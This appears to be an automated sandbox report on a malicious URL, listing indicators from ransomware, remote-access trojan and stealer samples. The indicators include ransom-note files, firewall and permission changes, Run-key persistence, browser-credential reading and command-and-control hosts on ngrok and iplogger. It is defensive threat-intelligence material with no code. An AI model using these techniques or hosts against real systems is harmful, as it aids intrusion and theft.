chimera | hxxps://bloxflip[.]com/a/kriszti

Analysis

max time kernel
705s
max time network
821s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05/10/2024, 15:47 UTC

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://bloxflip.com/a/kriszti

Score

10^/10

chimera revengerat rms agilenet defense_evasion discovery evasion execution persistence ransomware rat rezer0 spyware stealer trojan upx

Malware Config

Signatures

Chimera 64 IoCs

Ransomware which infects local and network files, often distributed via Dropbox links.

ransomware chimera

description	ioc	Process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\uk-ua\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\cs-cz\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

ReZer0 packer 1 IoCs

Detects ReZer0, a packer with multiple versions used in various campaigns.

rezer0

resource	yara_rule
behavioral1/memory/11332-56853-0x0000000005D10000-0x0000000005D38000-memory.dmp	rezer0

Renames multiple (3316) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

RevengeRat Executable 1 IoCs

stealer

resource	yara_rule
behavioral1/files/0x00070000000269cf-105338.dat	revengerat

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 22 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
6860	netsh.exe
14340	netsh.exe
9424	netsh.exe
17476	netsh.exe
16348	netsh.exe
17800	netsh.exe
14200	netsh.exe
7744	netsh.exe
19492	netsh.exe
15928	netsh.exe
10768	netsh.exe
5228	netsh.exe
17820	netsh.exe
14652	netsh.exe
19616	netsh.exe
7452	netsh.exe
16756	netsh.exe
8544	netsh.exe
9268	netsh.exe
7840	netsh.exe
17864	netsh.exe
10616	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	AnyDesk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	AnyDesk.exe

Executes dropped EXE 9 IoCs

pid	Process
2008	AnyDesk.exe
4420	AnyDesk.exe
4724	AnyDesk.exe
3404	AnyDesk.exe
2172	AnyDesk.exe
2928	AnyDesk.exe
1440	butterflyondesktop.tmp
5064	ButterflyOnDesktop.exe
3464	WIN2CC7.pif

Loads dropped DLL 2 IoCs

pid	Process
2172	AnyDesk.exe
3404	AnyDesk.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
11160	icacls.exe
17356	icacls.exe
11956	icacls.exe
6308	icacls.exe
5020	icacls.exe
14992	icacls.exe
18380	icacls.exe
15320	icacls.exe
13988	icacls.exe
2488	icacls.exe
19232	icacls.exe
20208	icacls.exe
16496	icacls.exe
10012	icacls.exe
4368	icacls.exe
14712	icacls.exe
11336	icacls.exe
3580	icacls.exe
8460	icacls.exe
6260	icacls.exe
9376	icacls.exe
15768	icacls.exe
8308	icacls.exe
13120	icacls.exe
17704	icacls.exe
14216	icacls.exe
16980	icacls.exe
14596	icacls.exe
6692	icacls.exe
16552	icacls.exe
6156	icacls.exe
2900	icacls.exe
14028	icacls.exe
15996	icacls.exe
9528	icacls.exe
10260	icacls.exe
8508	icacls.exe
19240	icacls.exe
17184	icacls.exe
12824	icacls.exe
6820	icacls.exe
9064	icacls.exe
11808	icacls.exe
7528	icacls.exe
15788	icacls.exe
9312	icacls.exe
14592	icacls.exe
16664	icacls.exe
14552	icacls.exe
12348	icacls.exe
20404	icacls.exe
17552	icacls.exe
9796	icacls.exe
12200	icacls.exe
15496	icacls.exe
13372	icacls.exe
15568	icacls.exe
20112	icacls.exe
11852	icacls.exe
9264	icacls.exe
12096	icacls.exe
13648	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/6264-34560-0x0000000002D20000-0x0000000002D34000-memory.dmp	agile_net

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop	butterflyondesktop.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\Desktop\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Email-Worm\\Winevar.exe"	Winevar.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\Desktop\\The-MALWARE-Repo-master\\The-MALWARE-Repo-master\\Email-Worm\\Winevar.exe"	Winevar.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WIN2CC7 = "C:\\Windows\\system32\\WIN2CC7.pif"	WIN2CC7.pif
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN2CC7 = "C:\\Windows\\system32\\WIN2CC7.pif"	WIN2CC7.pif

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
15184	powershell.exe

Drops desktop.ini file(s) 27 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	AnyDesk.exe
File opened for modification	C:\Program Files\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	AnyDesk.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	AnyDesk.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
535	0.tcp.ngrok.io
466	0.tcp.ngrok.io
500	iplogger.org
501	iplogger.org
509	0.tcp.ngrok.io

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
408	bot.whatismyipaddress.com

System Binary Proxy Execution: Verclsid 1 TTPs 3 IoCs

Adversaries may abuse Verclsid to proxy execution of malicious code.

defense_evasion

Verclsid

T1218.012

pid	Process
18660	verclsid.exe
12932	verclsid.exe
3408	verclsid.exe

AutoIT Executable 5 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0007000000024f91-42987.dat	autoit_exe
behavioral1/files/0x000700000002529e-46229.dat	autoit_exe
behavioral1/memory/2492-108636-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	autoit_exe
behavioral1/memory/2492-118029-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	autoit_exe
behavioral1/memory/2492-134886-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	autoit_exe

Drops file in System32 directory 22 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\DALLAH.exe	Maldal.a.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\WIN33AF.tmp	WIN2CC7.pif
File opened for modification	C:\Windows\SysWOW64\WIN2CC7.pif	Winevar.exe
File opened for modification	C:\Windows\SysWOW64\WIN2CF6.tmp	WIN2CC7.pif
File opened for modification	C:\Windows\SysWOW64\WIN337F.tmp	WIN2CC7.pif
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db	AnyDesk.exe
File created	C:\Windows\SysWOW64\DALLAH.exe	Maldal.a.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	AnyDesk.exe
File created	C:\Windows\SysWOW64\WIN2CC7.pif	Winevar.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00080000000262de-86357.dat	upx
behavioral1/memory/14772-89601-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/14772-105138-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/2492-108636-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	upx
behavioral1/memory/10728-110468-0x0000000000400000-0x0000000000454000-memory.dmp	upx
behavioral1/files/0x000100000003af6a-108589.dat	upx
behavioral1/memory/7008-113360-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/files/0x000100000003b1f2-115498.dat	upx
behavioral1/files/0x000100000003b1f3-117355.dat	upx
behavioral1/memory/18384-118030-0x0000000000400000-0x000000000040A000-memory.dmp	upx
behavioral1/memory/2492-118029-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	upx
behavioral1/memory/12460-117164-0x0000000000400000-0x0000000000445000-memory.dmp	upx
behavioral1/memory/2492-134886-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	upx
behavioral1/memory/14772-135140-0x0000000000400000-0x0000000000419000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarBadge.scale-150.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalMedTile.scale-200_contrast-black.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_MouseNose.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionSmallTile.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-40_altform-unplated.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeLargeTile.scale-125.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\WideTile.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreAppList.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptySearch.scale-125.png	AnyDesk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Median.xml	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\es-ES.mail.config	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\ui-strings.js	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\174.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-black\LargeTile.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\NavigationIcons\nav_icons_settings.targetsize-48.png	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons_2x.png	AnyDesk.exe
